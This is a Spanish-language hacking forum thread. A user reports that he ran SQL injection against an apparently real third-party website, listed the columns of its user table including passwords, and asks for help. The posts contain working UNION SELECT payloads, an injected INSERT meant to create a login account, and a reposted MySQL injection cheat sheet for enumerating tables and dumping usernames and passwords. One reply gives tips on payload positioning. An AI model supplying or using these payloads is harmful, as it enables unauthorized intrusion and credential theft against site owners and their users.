 Autor
|
Tema: Como seguir Con la inyeccion SQL (Leído 4,078 veces)
|
MagnoBalt
 Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
Hola que tal como va!! Encontre un pagina donde pude hacerles una inyecciones de SQL y me dio el nombre de la tabla mas Todas las culomnas.. les muestro algunas
dbo.tblUser.User_ID
dbo.tblUser.User_Code
dbo.tblUser.User_Password
dbo.tblUser.User_Permissions
dbo.tblUser.User_Number
dbo.tblUser.User_Firstname
dbo.tblUser.User_Surname
dbo.tblUser.User_TitleBefore
dbo.tblUser.User_TitleAfter
.
.Ahora cuando llego a tratar de sacarle la version por ejemplo con esto: 'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Me tira este error... Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint. Cuando me tendrai q dar algo asi.. Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2221.00 (Intel X86) Feb 9 2007 17:30:38 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int. Lo mismo pasa si pongo por ejemplo 'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- No se a lo qiue se refiere con ese error... Despues tambien como tengo las columnas intente agregar un registro con nombre de usuario y pass.. para loguearme puse ';INSERT INTO dbo.tblUser (User_Code, User_password) VALUES ('magnobalt', 'magno') --Y obtengo este error: error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated. Entiendo Como si estoy queriendo ingresar un dato duplicado en la clave primaria... Pero Intente con numeros altos al lado de mi user y me sigue arrojando el mismo error...Pero creo q la columna user no creo q sea la clave primaria...alguna ayuda!! Un abrazo Si alguien me puede dar una mano!! Gracias |
|
|
|
|
En línea
|
|
|
|
Darioxhcx
Desconectado
Mensajes: 2.294
|
capas que eso te sirve
*************************************************************************
* Information Schema *
*************************************************************************
-1/**/union/**/select/**/0,1,2,3/*
*************************************************************************
* Nombre de las Tablas *
*************************************************************************
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/*
*************************************************************************
* Recorrer las Tablas *
*************************************************************************
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/1,1/*
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/2,1/*
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/3,1/*
*************************************************************************
* Entrar en la Tabla *
*************************************************************************
-1/**/union/**/select/**/0,1,2,3/**/from/**/NOMBRE_DE_LA_TABLA
*************************************************************************
* Buscar Columnas en Una Tabla *
*************************************************************************
-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/**/where/*
*/table_schema='NOMBRE_DB_AQUI'/**/and/**/table_name='NOMBRE_TABLA_AQUI'
O
-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/*
*/where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/*
(N O M B R E D E L A T A B L A E N A S C I I)
*************************************************************************
* Recorrer Datos de la Columna *
*************************************************************************
-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/*
*/where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/**/limit/**/0,1/*
(N O M B R E D E L A T A B L A E N A S C I I)
*************************************************************************
* Concatenar *
*************************************************************************
-1/**/union/**/select/**/0,1,concat(NOMBRE_COLUMNA,0x3a,NOMBRE_COLUMNA,0x3a ,etc),3/**/from/**/NOMBRE_DE_LA_TABLA/*
Ejemplo:
-1/**/union/**/select/**/0,1,concat(username,0x3a,password,0x3a,email),3/ **/from/**/usuarios/*
**************************************************************************
* Funciones de Informaci?n *
**************************************************************************
* version() : version actual de mysql
* database() : nombre base de datos
* user() : conectado a la base de datos
* system_user()
* session_user()
* current_user()
* last_insert_id()
* connection_id()
**************************************************************************
* By boER! *
**************************************************************************
* Greets: Remote Execution *
**************************************************************************
Fuente Remoteexecution.org
saludos
|
|
|
|
|
En línea
|
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint. prueba poniendo lo que quieres sacar en otras posiciones de la consulta 'union select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- 'union select 1,1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- ..... ...... |
|
|
|
|
En línea
|
|
|
|
MagnoBalt
Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
Ahi esta una ya solocione en vez de colocarlo asi 'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Lo coloque asi 'union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, @@servername -- y me dio su hermosoo Error Error: ERROR [22018] [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'WSMSSQL02..................' to data type int. Si alguien sabe A que se refiere con el error donde me dice que esta duplicando el dato en la clave primaria... coloco otra vez error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated. Ahora vengo de la facu y sigo intentandoo.. Saludos Grcias por la ayuda tambienn |
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
Como seguir en Python
Scripting
|
Fyrox
|
1
|
2,085
|
28 Septiembre 2011, 04:05 am
por Novlucker
|
|
|
|
Como evitar una inyección sql?
Nivel Web
|
andvilla07
|
1
|
2,282
|
26 Noviembre 2012, 15:46 pm
por Shell Root
|
|
|
|
Cómo seguir comentando con tu pseudónimo o nick en YouTube
Noticias
|
wolfbcn
|
0
|
1,508
|
10 Noviembre 2013, 21:59 pm
por wolfbcn
|
|
|
|
¿como me recomiendan seguir? (siguiendo la ruta de validacion de un .exe)
Ingeniería Inversa
|
tomasjrl
|
4
|
2,841
|
2 Octubre 2014, 05:52 am
por tomasjrl
|
|
|
|
¿Como seguir con Java?
Programación General
|
JVulture
|
2
|
2,018
|
3 Noviembre 2015, 11:18 am
por WhiteDeMoN
|
 |
